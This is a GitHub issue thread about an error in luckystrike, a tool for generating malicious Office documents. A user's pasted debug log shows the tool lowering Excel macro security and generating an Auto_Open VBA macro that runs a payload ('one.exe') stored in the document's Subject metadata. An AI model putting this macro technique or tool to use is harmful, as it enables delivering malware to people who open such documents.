### ISSUE TITLE
Generating Erro

### ISSUE THREAD

**Issue by salamohamad** [curi0usJack/luckystrike#35]
could you please see this:

[DBG] - PROCESS-MENUOPTIONS: SELECTION: 1
[DBG] - CREATE-WORD: LINELENGTH:
[DBG] - CREATE-WORD: ISMODIFY: False
[DBG] - CREATE-WORD: EXISTINGPATH:
[DBG] - DO-FILEPREREQS: EXISTINGPATH:
[DBG] - DO-FILEPREREQS: FILENAME:
[DBG] - DO-FILEPREREQS: DOCTYPENAME: doc
[DBG] - DO-FILEPREREQS: OFFICEVERSION: 16.0
[DBG] - DO-FILEPREREQS: POWERSHELL VERSION: 5.1.15063.502
[DBG] - DO-FILEPREREQS: OFFICE VERSION: 16.0
[DBG] - DO-FILEPREREQS: OFFICE BITNESS: x64
[DBG] - DO-FILEPREREQS: OFFICE REGKEY: HKLM:\SOFTWARE\Microsoft\Office\16.0\Outlook
[DBG] - DO-FILEPREREQS: WINDOWS VERSION: 10.0.15063.0
[DBG] - DO-FILEPREREQS: WINDOWS BITNESS: 64-bit
[DBG] - DO-FILEPREREQS: ISADMIN: True
[DBG] - DO-FILEPREREQS: DOCTYPEID: 2
Index was outside the bounds of the array.

At C:\Windows\system32\luckystrike\luckystrike.ps1:1783 char:4
+             $Word.DisplayAlerts = "wdAlertsNone"
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : OperationStopped: (:) [], IndexOutOfRangeException
    + FullyQualifiedErrorId : System.IndexOutOfRangeException

PS C:\Windows\system32\luckystrike>

Thank you

**Comment by salamohamad** [comment]
![skarmavbild 2017-08-14 kl 16 05 33](https://user-images.githubusercontent.com/30568878/29275825-bd1d24da-810c-11e7-980b-1e9b185fb980.png)

**Comment by curi0usJack** [comment]
Please upgrade to luckystrike 2.0 and post the full debug .log file. Are you running multiple versions of office?? If not, please let me know which version of Word you're running.

**Comment by salamohamad** [comment]
Thx for the reply!

I only have installed office 2016   so far:


![skarmavbild 2017-08-15 kl 09 43 56](https://user-images.githubusercontent.com/30568878/29306515-593e447a-819e-11e7-831f-203f204764f3.png)

##########debug-file
	
    __               __            _____ __       _ __      
   / /   __  _______/ /____  __   / ___// /______(_) /_____ 
  / /   / / / / ___/ //_/ / / /   \__ \/ __/ ___/ / //_/ _ \
 / /___/ /_/ / /__/ ,< / /_/ /   ___/ / /_/ /  / / ,< /  __/
/_____/\__,_/\___/_/|_|\__, /   /____/\__/_/  /_/_/|_|\___/ 
                      /____/                                

		ALL YOUR PAIN IN ONE MACRO.

		  2.0 - @curi0usJack
		
Debug logging enabled
CURRENT VERSION: 2.0
NEXT VERSION: 2.0

============= Main Menu ================

	1)  Payload Options
	2)  Catalog Options
	3)  File Options
	4)  Encode a PowerShell Command
	99) Exit

PROCESS-MENUOPTIONS: SELECTION: r
Invalid option. Try again.

============= Main Menu ================

	1)  Payload Options
	2)  Catalog Options
	3)  File Options
	4)  Encode a PowerShell Command
	99) Exit

PROCESS-MENUOPTIONS: SELECTION: 1

=========== Payload Options ============

	1)  Select a payload
	2)  Unselect a payload 
	3)  Show selected payloads
	99) Back

PROCESS-MENUOPTIONS: SELECTION: 1

Please select the document type you wish to make:

	1)  xls
	2)  doc


SELECT-PAYLOAD: DOCTYPEID: 1

=========== Select Payload =============

	1)  one
	99) Done.


SELECT-PAYLOAD: PAYLOADSELECTION: 1

======== Choose Infection Method =======

	1)  Shell Command
	2)  Metadata
	3)  DDE
	98) Help


SELECT-PAYLOAD: ITSELECTION: 2
Duplicate Active Check Count: 0
Payload added!

=========== Select Payload =============

	1)  one
	99) Done.


SELECT-PAYLOAD: PAYLOADSELECTION: 99

=========== Payload Options ============

	1)  Select a payload
	2)  Unselect a payload 
	3)  Show selected payloads
	99) Back

PROCESS-MENUOPTIONS: SELECTION: 99

============= Main Menu ================

	1)  Payload Options
	2)  Catalog Options
	3)  File Options
	4)  Encode a PowerShell Command
	99) Exit

PROCESS-MENUOPTIONS: SELECTION: 3

=========== File Options ===============

	1)  Generate new file
	2)  Update existing file
	3)  Generate from template
	4)  Write existing macro code to file
	99) Back

PROCESS-MENUOPTIONS: SELECTION: 1
CREATE-EXCEL: LINELENGTH: 
CREATE-EXCEL: ISMODIFY: False
CREATE-EXECL: EXISTINGPATH: 
DO-FILEPREREQS: EXISTINGPATH: 
DO-FILEPREREQS: FILENAME: 
DO-FILEPREREQS: DOCTYPENAME: xls
DO-FILEPREREQS: OFFICEVERSION: 16.0
DO-FILEPREREQS: POWERSHELL VERSION: 5.1.15063.502
DO-FILEPREREQS: OFFICE VERSION: 16.0
DO-FILEPREREQS: OFFICE BITNESS: x64
DO-FILEPREREQS: OFFICE REGKEY: HKLM:\SOFTWARE\Microsoft\Office\16.0\Outlook
DO-FILEPREREQS: WINDOWS VERSION: 10.0.15063.0
DO-FILEPREREQS: WINDOWS BITNESS: 64-bit
DO-FILEPREREQS: ISADMIN: True
DO-FILEPREREQS: DOCTYPEID: 1
ADJUST-MACROSECURITY: DOCTYPENAME: xls
ADJUST-MACROSECURITY: OFFICEVERSION: 16.0
ADJUST-MACROSECURITY: APPNAME: Excel
ADJUST-MACROSECURITY: VAL: 1
ADJUST-MACROSECURITY: REGKEY: HKCU:\Software\Microsoft\Office\16.0\Excel\Security
MACROSEC KEY: HKCU:\Software\Microsoft\Office\16.0\Excel\Security
GENERATE-MACRO: INSERTAUTOOPEN: True
GENERATE-MACRO: LINELENGTH: 
GENERATE-MACRO: ISMODIFY: False
GENERATE-MACRO: DOCTYPE: 1
Generating macro code.
GENERATE-MACRO: CALLSTRING: 	Call Rkg3Zq6d

GENERATE-MACRO: AOSTRING: Sub Auto_Open

	Call Rkg3Zq6d

End Sub


GENERATE MACRO: Added Payload: one. InfectionType: 8. Legend: 225,607,1. FunctionName: Rkg3Zq6d
GENERATE-MACRO: MACROCODE: Sub Auto_Open

	Call Rkg3Zq6d

End Sub


Function Rkg3Zq6d()
    Shell (ActiveWorkbook.BuiltinDocumentProperties.Item("Subject"))
End Function


GENERATE MACRO: MACRO CODE LENGTH: 144
Embedding payloads into workbook.
Adding the following payload to Subject metadata: one.exe
Error occurred creating document. Could not load file or assembly 'Microsoft.Office.Interop.Excel, Version=12.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c' or one of its dependencies. The system cannot find the file specified.
ADJUST-MACROSECURITY: DOCTYPENAME: xls
ADJUST-MACROSECURITY: OFFICEVERSION: 16.0
ADJUST-MACROSECURITY: APPNAME: Excel
ADJUST-MACROSECURITY: VAL: 0
ADJUST-MACROSECURITY: REGKEY: HKCU:\Software\Microsoft\Office\16.0\Excel\Security
MACROSEC KEY: HKCU:\Software\Microsoft\Office\16.0\Excel\Security

**Comment by salamohamad** [comment]
the Issue was only due to the fact that I had the Macros disables all along in my trust cenetr of the MSOffice. 
Sorry

**Comment by curi0usJack** [comment]
THANK YOU for responding. I've had others who have had that issue and I had
no idea how to help them. Much appreciated!

**Comment by bilimaster** [comment]
i have the same probleme as you but my office macro is enable, i think  the ptobleme is elsewhere, i'm sitll looking for.
